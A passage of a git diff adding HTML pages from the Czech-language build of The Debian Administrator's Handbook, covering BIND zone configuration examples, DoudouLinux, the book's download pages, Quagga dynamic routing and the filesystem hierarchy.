+                  class="filename">/etc/bind/named.conf.local</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+zone "falcot.com" {
+        type master;
+        file "/etc/bind/db.falcot.com";
+        allow-query { any; };
+        allow-transfer {
+                195.20.105.149/32 ; // ns0.xname.org
+                193.23.158.13/32 ; // ns1.xname.org
+        };
+};
+
+zone "internal.falcot.com" {
+        type master;
+        file "/etc/bind/db.internal.falcot.com";
+        allow-query { 192.168.0.0/16; };
+};
+
+zone "168.192.in-addr.arpa" {
+        type master;
+        file "/etc/bind/db.192.168";
+        allow-query { 192.168.0.0/16; };
+};
+</pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="example.bind-db.falcot.com"></a><p
+              class="title"><strong>Příklad 10.13. Excerpt of <code
+                  class="filename">/etc/bind/db.falcot.com</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">; falcot.com Zone 
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+;
+; The @ refers to the zone name ("falcot.com" here)
+; or to $ORIGIN if that directive has been used
+;
+@       IN      NS      ns
+@       IN      NS      ns0.xname.org.
+
+internal IN      NS      192.168.0.2
+
+@       IN      A       212.94.201.10
+@       IN      MX      5 mail
+@       IN      MX      10 mail2
+
+ns      IN      A       212.94.201.10
+mail    IN      A       212.94.201.10
+mail2   IN      A       212.94.201.11
+www     IN      A       212.94.201.11
+
+dns     IN      CNAME   ns
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Syntax of a name</strong></p></div></div></div><div
+              class="para">
+				The syntax of machine names follows strict rules. For instance, <code
+                class="literal">machine</code> implies <code
+                class="literal">machine.<em
+                  class="replaceable">domain</em></code>. If the domain name should not be appended to a name, said name must be written as <code
+                class="literal">machine.</code> (with a dot as suffix). Indicating a DNS name outside the current domain therefore requires a syntax such as <code
+                class="literal">machine.otherdomain.com.</code> (with the final dot).
+			</div></div><div
+            class="example"><a
+              xmlns=""
+              id="example.bind-db.192.168"></a><p
+              class="title"><strong>Příklad 10.14. Excerpt of <code
+                  class="filename">/etc/bind/db.192.168</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">; Reverse zone for 192.168.0.0/16
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     ns.internal.falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+
+        IN      NS      ns.internal.falcot.com.
+
+; 192.168.0.1 -&gt; arrakis
+1.0     IN      PTR     arrakis.internal.falcot.com.
+; 192.168.0.2 -&gt; neptune
+2.0     IN      PTR     neptune.internal.falcot.com.
+
+; 192.168.3.1 -&gt; pau
+1.3     IN      PTR     pau.internal.falcot.com.
+</pre></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ipv6.html"><strong>Předcházející</strong>10.5. IPv6</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dhcp.html"><strong>Další</strong>10.7. DHCP</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html
new file mode 100644
index 000000000..f6018a21d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.doudoulinux.html
@@ -0,0 +1,87 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.11. DoudouLinux</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.tanglu.html"
+        title="A.10. Tanglu" /><link
+        rel="next"
+        href="sect.raspbian.html"
+        title="A.12. Raspbian" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.doudoulinux.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tanglu.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.raspbian.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.doudoulinux"></a>A.11. DoudouLinux</h2></div></div></div><a
+          id="id-1.20.14.2"
+          class="indexterm"></a><div
+          class="para">
+			DoudouLinux targets young children (starting from 2 years old). To achieve this goal, it provides an heavily customized graphical interface (based on LXDE) and comes with many games and educative applications. Internet access is filtered to prevent children from visiting problematic websites. Advertisements are blocked. The goal is that parents should be free to let their children use their computer once booted into DoudouLinux. And children should love using DoudouLinux, just like they enjoy their gaming console. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.doudoulinux.org">http://www.doudoulinux.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tanglu.html"><strong>Předcházející</strong>A.10. Tanglu</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.raspbian.html"><strong>Další</strong>A.12. Raspbian</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html
new file mode 100644
index 000000000..83655d59e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-book.html
@@ -0,0 +1,95 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">D.3. Download the book</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="website.html"
+        title="Příloha D. Get the book" /><link
+        rel="prev"
+        href="sect.download-the-electronic-version.html"
+        title="D.2. Download the electronic version" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.download-the-book.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.download-the-electronic-version.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.download-the-book"></a>D.3. Download the book</h2></div></div></div><div
+          class="para">
+			<span
+            class="emphasis"><em>Thank you very much for your donation</em></span>. We really appreciate it. We hope that you will enjoy our book!
+		</div><div
+          class="para">
+			The book is available in 3 formats and multiple languages (see other tabs for translations).
+		</div><div
+          class="para">
+			The PDF format is the document corresponding to the printed book. It's not suitable for reading on small screens. The EPUB format is the recommended format if your reading devices supports it (most smartphones and many ebook readers do support it). The Mobipocket format is mainly for ebook readers that do not support EPUB (like the Kindle).
+		</div><div
+          class="para">
+			Click on the link of the version that you wish to download:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					English PDF (30 Mb)
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					English EPUB (5 Mb)
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					English Mobipocket (13 Mb)
+				</div></li></ul></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.download-the-electronic-version.html"><strong>Předcházející</strong>D.2. Download the electronic version</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html
new file mode 100644
index 000000000..421a79203
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.download-the-electronic-version.html
@@ -0,0 +1,89 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">D.2. Download the electronic version</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="website.html"
+        title="Příloha D. Get the book" /><link
+        rel="prev"
+        href="website.html"
+        title="Příloha D. Get the book" /><link
+        rel="next"
+        href="sect.download-the-book.html"
+        title="D.3. Download the book" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.download-the-electronic-version.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="website.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-book.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.download-the-electronic-version"></a>D.2. Download the electronic version</h2></div></div></div><div
+          class="para">
+			The e-book is available in 3 formats (PDF, EPUB, Mobipocket) and multiple languages.
+		</div><div
+          class="para">
+			The book is freely available because we want everybody to benefit from it. That said maintaining it for each new Debian release takes time and lots of effort, and we appreciate being thanked for this. If you find this book valuable, please consider contributing to its continued maintenance either by buying a paperback copy or by making a donation via the form below (after having completed your donation, you will be automatically directed to the download page).
+		</div><div
+          class="para">
+			Pick your contribution:
+		</div><div
+          class="para">
+			You can also directly download the book on <a
+            href="https://debian-handbook.info/get/now/">this page</a>. In that case, we hope that you will contribute to the book's success by spreading the word around you. Of course, you can always come back later to make a donation.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="website.html"><strong>Předcházející</strong>Příloha D. Get the book</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-book.html"><strong>Další</strong>D.3. Download the book</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html
new file mode 100644
index 000000000..bfa627062
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dynamic-routing.html
@@ -0,0 +1,168 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.4. Dynamic Routing</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.quality-of-service.html"
+        title="10.3. Quality of Service" /><link
+        rel="next"
+        href="sect.ipv6.html"
+        title="10.5. IPv6" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dynamic-routing.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quality-of-service.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ipv6.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dynamic-routing"></a>10.4. Dynamic Routing</h2></div></div></div><a
+          id="id-1.13.7.2"
+          class="indexterm"></a><a
+          id="id-1.13.7.3"
+          class="indexterm"></a><a
+          id="id-1.13.7.4"
+          class="indexterm"></a><div
+          class="para">
+			The reference tool for dynamic routing is currently <code
+            class="command">quagga</code>, from the similarly-named package; it used to be <code
+            class="command">zebra</code> until development of the latter stopped. However, <code
+            class="command">quagga</code> kept the names of the programs for compatibility reasons which explains the <code
+            class="command">zebra</code> commands below.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Dynamic routing</strong></p></div></div></div><div
+            class="para">
+			Dynamic routing allows routers to adjust, in real time, the paths used for transmitting IP packets. Each protocol involves its own method of defining routes (shortest path, use routes advertised by peers, and so on).
+		</div><div
+            class="para">
+			In the Linux kernel, a route links a network device to a set of machines that can be reached through this device. The <code
+              class="command">route</code> command defines new routes and displays existing ones.
+		</div><a
+            id="id-1.13.7.6.4"
+            class="indexterm"></a></div><div
+          class="para">
+			Quagga is a set of daemons cooperating to define the routing tables to be used by the Linux kernel; each routing protocol (most notably BGP, OSPF and RIP) provides its own daemon. The <code
+            class="command">zebra</code> daemon collects information from other daemons and handles static routing tables accordingly. The other daemons are known as <code
+            class="command">bgpd</code>, <code
+            class="command">ospfd</code>, <code
+            class="command">ospf6d</code>, <code
+            class="command">ripd</code>, <code
+            class="command">ripngd</code>, <code
+            class="command">isisd</code>, and <code
+            class="command">babeld</code>.
+		</div><a
+          id="id-1.13.7.8"
+          class="indexterm"></a><a
+          id="id-1.13.7.9"
+          class="indexterm"></a><a
+          id="id-1.13.7.10"
+          class="indexterm"></a><a
+          id="id-1.13.7.11"
+          class="indexterm"></a><a
+          id="id-1.13.7.12"
+          class="indexterm"></a><a
+          id="id-1.13.7.13"
+          class="indexterm"></a><a
+          id="id-1.13.7.14"
+          class="indexterm"></a><a
+          id="id-1.13.7.15"
+          class="indexterm"></a><a
+          id="id-1.13.7.16"
+          class="indexterm"></a><a
+          id="id-1.13.7.17"
+          class="indexterm"></a><a
+          id="id-1.13.7.18"
+          class="indexterm"></a><a
+          id="id-1.13.7.19"
+          class="indexterm"></a><div
+          class="para">
+			Daemons are enabled by editing the <code
+            class="filename">/etc/quagga/daemons</code> file and creating the appropriate configuration file in <code
+            class="filename">/etc/quagga/</code>; this configuration file must be named after the daemon, with a <code
+            class="filename">.conf</code> extension, and belong to the <code
+            class="literal">quagga</code> user and the <code
+            class="literal">quaggavty</code> group, in order for the <code
+            class="filename">/etc/init.d/quagga</code> script to invoke the daemon.
+		</div><div
+          class="para">
+			The configuration of each of these daemons requires knowledge of the routing protocol in question. These protocols cannot be described in detail here, but the <span
+            class="pkg pkg">quagga-doc</span> provides ample explanation in the form of an <code
+            class="command">info</code> file. The same contents may be more easily browsed as HTML on the Quagga website: <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.nongnu.org/quagga/docs/docs-info.html">http://www.nongnu.org/quagga/docs/docs-info.html</a></div>
+		</div><div
+          class="para">
+			In addition, the syntax is very close to a standard router's configuration interface, and network administrators will adapt quickly to <code
+            class="command">quagga</code>.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> OSPF, BGP or RIP?</strong></p></div></div></div><div
+            class="para">
+			OSPF is generally the best protocol to use for dynamic routing on private networks, but BGP is more common for Internet-wide routing. RIP is rather ancient, and hardly used anymore.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quality-of-service.html"><strong>Předcházející</strong>10.3. Quality of Service</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ipv6.html"><strong>Další</strong>10.5. IPv6</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html
new file mode 100644
index 000000000..5895fd259
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.filesystem-hierarchy.html
@@ -0,0 +1,223 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.2. Organization of the Filesystem Hierarchy</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="next"
+        href="sect.computer-layers.html"
+        title="B.3. Inner Workings of a Computer: the Different Layers Involved" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.filesystem-hierarchy.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="short-remedial-course.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.computer-layers.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.filesystem-hierarchy"></a>B.2. Organization of the Filesystem Hierarchy</h2></div></div></div><a
+          id="id-1.21.5.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.21.5.3"></a>B.2.1. The Root Directory</h3></div></div></div><div
+            class="para">
+				A Debian system is organized along the <span
+              class="emphasis"><em>Filesystem Hierarchy Standard</em></span> (FHS). This standard defines the purpose of each directory. For instance, the top-level directories are described as follows:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/bin/</code>: basic programs;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/boot/</code>: Linux kernel and other files required for its early boot process;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/dev/</code>: device files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/etc/</code>: configuration files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/home/</code>: user's personal files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/lib/</code>: basic libraries;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/media/*</code>: mount points for removable devices (CD-ROM, USB keys and so on);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/mnt/</code>: temporary mount point;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/opt/</code>: extra applications provided by third parties;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/root/</code>: administrator's (root's) personal files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/run/</code>: volatile runtime data that does not persist across reboots (not yet included in the FHS);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/sbin/</code>: system programs;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/srv/</code>: data used by servers hosted on this system;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/tmp/</code>: temporary files; this directory is often emptied at boot;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/usr/</code>: applications; this directory is further subdivided into <code
+                    class="filename">bin</code>, <code
+                    class="filename">sbin</code>, <code
+                    class="filename">lib</code> (according to the same logic as in the root directory). Furthermore, <code
+                    class="filename">/usr/share/</code> contains architecture-independent data. <code
+                    class="filename">/usr/local/</code> is meant to be used by the administrator for installing applications manually without overwriting files handled by the packaging system (<code
+                    class="command">dpkg</code>).
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/var/</code>: variable data handled by daemons. This includes log files, queues, spools, caches and so on.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/proc/</code> and <code
+                    class="filename">/sys/</code> are specific to the Linux kernel (and not part of the FHS). They are used by the kernel for exporting data to user space (see <a
+                    class="xref"
+                    href="sect.computer-layers.html#sect.userspace-presentation">B.3.4 – „The User Space“</a> and <a
+                    class="xref"
+                    href="sect.user-space.html">B.5 – „The User Space“</a> for explanations about this concept).
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.21.5.4"></a>B.2.2. The User's Home Directory</h3></div></div></div><div
+            class="para">
+				The contents of a user's home directory is not standardized, but there are still a few noteworthy conventions. One is that a user's home directory is often referred to by a tilde (“~”). That is useful to know because command interpreters automatically replace a tilde with the correct directory (usually <code
+              class="filename">/home/<em
+                class="replaceable">user</em>/</code>).
+			</div><div
+            class="para">
+				Traditionally, application configuration files are often stored directly under the user's home directory, but their names usually start with a dot (for instance, the <code
+              class="command">mutt</code> email client stores its configuration in <code
+              class="filename">~/.muttrc</code>). Note that filenames that start with a dot are hidden by default; and <code
+              class="command">ls</code> only lists them when the <code
+              class="literal">-a</code> option is used, and graphical file managers need to be told to display hidden files.
+			</div><div
+            class="para">
+				Some programs also use multiple configuration files organized in one directory (for instance, <code
+              class="filename">~/.ssh/</code>). Some applications (such as the Iceweasel web browser) also use their directory to store a cache of downloaded data. This means that those directories can end up using a lot of disk space.
+			</div><div
+            class="para">
+				These configuration files stored directly in a user's home directory, often collectively referred to as <span
+              class="emphasis"><em>dotfiles</em></span>, have long proliferated to the point that these directories can be quite cluttered with them. Fortunately, an effort led collectively under the FreeDesktop.org umbrella has resulted in the “XDG Base Directory Specification”, a convention that aims at cleaning up these files and directory. This specification states that configuration files should be stored under <code
+              class="filename">~/.config</code>, cache files under <code
+              class="filename">~/.cache</code>, and application data files under <code
+              class="filename">~/.local</code> (or subdirectories thereof). This convention is slowly gaining traction, and several applications (especially graphical ones) have started following it.
+			</div><div
+            class="para">
+				Graphical desktops usually display the contents of the <code
+              class="filename">~/Desktop/</code> directory (or whatever the appropriate translation is for systems not configured in English) on the desktop (ie, what is visible on screen once all applications are closed or iconized).
+			</div><div
+            class="para">
+				Finally, the email system sometimes stores incoming emails into a <code
+              class="filename">~/Mail/</code> directory.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="short-remedial-course.html"><strong>Předcházející</strong>Příloha B. Short Remedial Course</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.computer-layers.html"><strong>Další</strong>B.3. Inner Workings of a Computer: the Different ...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html
new file mode 100644
index 000000000..7bf26176d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.firewall-packet-filtering.html
@@ -0,0 +1,584 @@
